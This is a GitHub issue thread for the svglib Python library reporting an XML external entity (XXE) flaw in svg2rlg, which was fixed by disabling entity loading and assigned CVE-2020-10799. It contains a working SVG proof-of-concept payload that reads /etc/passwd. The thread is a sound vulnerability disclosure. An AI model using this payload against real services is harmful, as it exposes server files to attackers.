Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

No disabling external entity expansion (XXE) #229

Closed
MrLion9 opened this issue Feb 25, 2020 · 9 comments
Closed

No disabling external entity expansion (XXE) #229

MrLion9 opened this issue Feb 25, 2020 · 9 comments

Comments

@MrLion9
Copy link

MrLion9 commented Feb 25, 2020
edited

Hi! I found that I can perform XXE attack (https://en.wikipedia.org/wiki/XML_external_entity_attack) when using svg2rlg function

Code:

saved_image_path = 'test_png.png'
with open("./test.svg", "wb") as f: 
            f.write(image)
drawing = svg2rlg(image_path)
renderPM.drawToFile(drawing, saved_image_path, fmt="PNG")

Payload (test.svg)

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
    <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg width="10cm" height="3cm" viewBox="0 0 1000 300"
     xmlns="http://www.w3.org/2000/svg" version="1.1">
  <desc>Example text01 - 'Hello, out there' in blue</desc>

  <text x="250" y="150" 
        font-family="Verdana" font-size="55" fill="blue" >
    &xxe;
  </text>

  <!-- Show outline of canvas using 'rect' element -->
  <rect x="1" y="1" width="998" height="298"
        fill="none" stroke="blue" stroke-width="2" />
</svg>
@deeplook
Copy link
Owner

It would be nice to put a link like this with your description, if this is what you mean... https://en.wikipedia.org/wiki/XML_external_entity_attack

@MrLion9
Copy link
Author

MrLion9 commented Feb 25, 2020

Yes, that’s what I meant )

@averonesis
Copy link

Hello @deeplook will you fix the issue?

@claudep
Copy link
Collaborator

claudep commented Mar 6, 2020

Hello @averonesis will you suggest a patch?

claudep added a commit to claudep/svglib that referenced this issue Mar 7, 2020
@claudep
Fixes deeplook#229 - External entity loading disabled by default
0c03e46
@claudep
Copy link
Collaborator

claudep commented Mar 7, 2020

@MrLion9, could you have a look at the patch, please?

@averonesis
Copy link

@claudep yep, looks good, thank you!

@MrLion9 MrLion9 closed this as completed Mar 10, 2020
@claudep
Copy link
Collaborator

claudep commented Mar 10, 2020

I guess you approved through emojis 😄
I reopen, because closing should be done when the patch is merged.

@claudep claudep reopened this Mar 10, 2020
@NicoleG25
Copy link

I believe that CVE-2020-10799 was assigned to this issue :)

claudep added a commit that referenced this issue Mar 22, 2020
@claudep
Fixes #229 - External entity loading disabled by default
d6d08c4 
Fixes CVE-2020-10799
@claudep
Copy link
Collaborator

claudep commented Mar 22, 2020

I pushed both a 0.9.4 release to have a Python 2 compatible release with the fix and a 1.0.0 release which is now Python 2 free.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@claudep @deeplook @averonesis @MrLion9 @NicoleG25